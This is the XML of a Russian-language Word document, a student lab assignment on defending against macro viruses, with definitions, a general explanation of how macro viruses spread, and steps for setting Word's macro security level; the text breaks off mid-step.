    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>практическое освоение студентами научно-теоретических полож</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ний дисциплины по вопросам защиты информации от воздействия вредоносн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го программного обеспечения на основе использования методов и средств пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>филактики вирусных атак, а также овладение ими техникой экспериментальных исследований и анализа полученных результатов, привитие навыков работы с вычислительной техникой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="562"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5962"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Макрос</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - макрокоманда или набор макрокоманд, используемый для а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>томатического выполнения некоторых операций. Макросы записываются на языке программирования Visual Basic для приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Макровирус</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – вредоносная программа, прописанная в макросе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цифровая подпись макроса</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Специально созданный фрагмент макроса, подтверждающий  его подлинность и безопасность. Наличие цифровой подписи подтверждает, что макрос или документ был получен от владельца подписи и не был изменен.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цифровой сертификат</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - вложение в файл, проект макроса или сообщ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ние электронной почты, подтверждающее его подлинность, обеспечивающее шифрование или предоставляющее поддающуюся проверке подпись. Для ци</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ф</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рового подписания проектов макросов необходимо установить цифровой се</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тификат.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Макровирусы используют возможности макроязыков, встроенных в с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">стемы обработки данных (текстовые редакторы, электронные таблицы и т.д.). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для существования вирусов в конкретной системе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> необходимо нал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">чие встроенного в систему макроязыка со следующими возможностями: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">привязка программы на макроязыке к конкретному файлу; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>копирование макропрограмм (далее макросов) из одного файла в др</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">гой; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">возможность получения управления макросом без вмешательства пользователя (автоматические или стандартные макросы). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данным условиям удовлетворяют редакторы Microsoft Word и AmiPro, а также редактор электронных таблиц Excel. Эти системы содержат в себе макр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>языки (Word - Word Basic, Excel - Visual Basic). В этих системах вирусы пол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чают управление при открытии или закрытии зараженного файла, перехват</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вают стандартные файловые функции и затем заражают файлы, к которым к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ким-либо образом идет обращение. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Макровирусы активны не только в момент открытия/закрытия файла, но до тех пор, пока активен сам редактор. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В текстовом процессоре Microsoft Word определены, например, макросы, которые автоматически получают управление при вызове пользователем одной из стандартных команд — FileSave (Файл | Сохранить), FileSaveAs (Файл | С</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хранить как), ToolsMacro (Сервис | Макрос | Макросы), ToolsCustomize (Сервис | Настройка) и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Документ Microsoft Office может также содержать макросы, автоматич</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ски получающие управление при нажатии пользователем определенной комб</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нации клавиш на клавиатуре или достижении некоторого момента времени (д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ты, времени суток). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Так как макровирусы распространяются под управлением прикладных программ, то этот факт делает их независимыми от операционной системы.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Наилучшим способом защиты от вредоносных макросов (макровирусов) в дополнение </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>к административным мерам необходимо приобрести и установить специальное антивирусное программное обеспечение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5798"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Исследовать порядок формирования политики защиты от макров</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">русов при использовании приложения Microsoft Word </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5798"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5798"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Алгоритм выполнения работы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустите приложение </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Microsoft Word  из пакета Office.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Произвести настройку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>уровня безопасности при отработке макросов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В меню </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сервис</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> выбрать команду </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Параметры</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Открыть вкладку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Безопасность</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В группе </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Защита от макросов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> нажать кнопку </w:t>
